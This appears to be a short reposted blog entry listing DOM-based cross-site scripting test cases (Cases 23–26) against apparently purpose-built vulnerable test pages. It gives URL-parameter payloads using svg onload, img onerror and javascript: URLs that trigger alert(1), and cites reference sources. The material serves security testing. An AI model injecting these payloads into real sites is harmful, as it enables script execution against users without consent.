DOM-based XSS Test Cases

Coder编程 2020-08-30

展开全文

Case 23 - DOM Injection via URL parameter (by server + client)

https:///dom/dom.php?p=Hello.<svg onload=alert(1)>

https:///dom/dom.php?p=<img src=x onerror=alert(1)>

Case 24 - DOM Injection via URL Parameter (Document Sink)

https:///dom/sinks.html?name=KNOXSS'<svg onload=alert(1)>

https:///dom/sinks.html?name=<img src=x onerror=alert(1)>

Case 25 - DOM Injection via Open Redirection (Location Sink)

https:///dom/sinks.html?redir=javascript:alert(1)

Case 26 - DOM Injection via URL Parameter (Execution Sink)

https:///dom/sinks.html?index='NASDAQ<svg onload=alert(1)>'

https:///dom/sinks.html?index='NASDAQ';alert(1);

参考：

https:///knoxss.html

https://xz.aliyun.com/t/4283

本站是提供个人知识管理的网络存储空间，所有内容均由用户发布，不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息，谨防诈骗。如发现有害或侵权内容，请点击一键举报。

转藏分享

QQ空间 QQ好友新浪微博微信

献花（0） +1

来自： Coder编程 > 《待分类》

举报/认领

0条评论

请遵守用户评论公约

类似文章 更多

Coder编程

关注对话

喜欢该文的人也喜欢更多

热门阅读换一换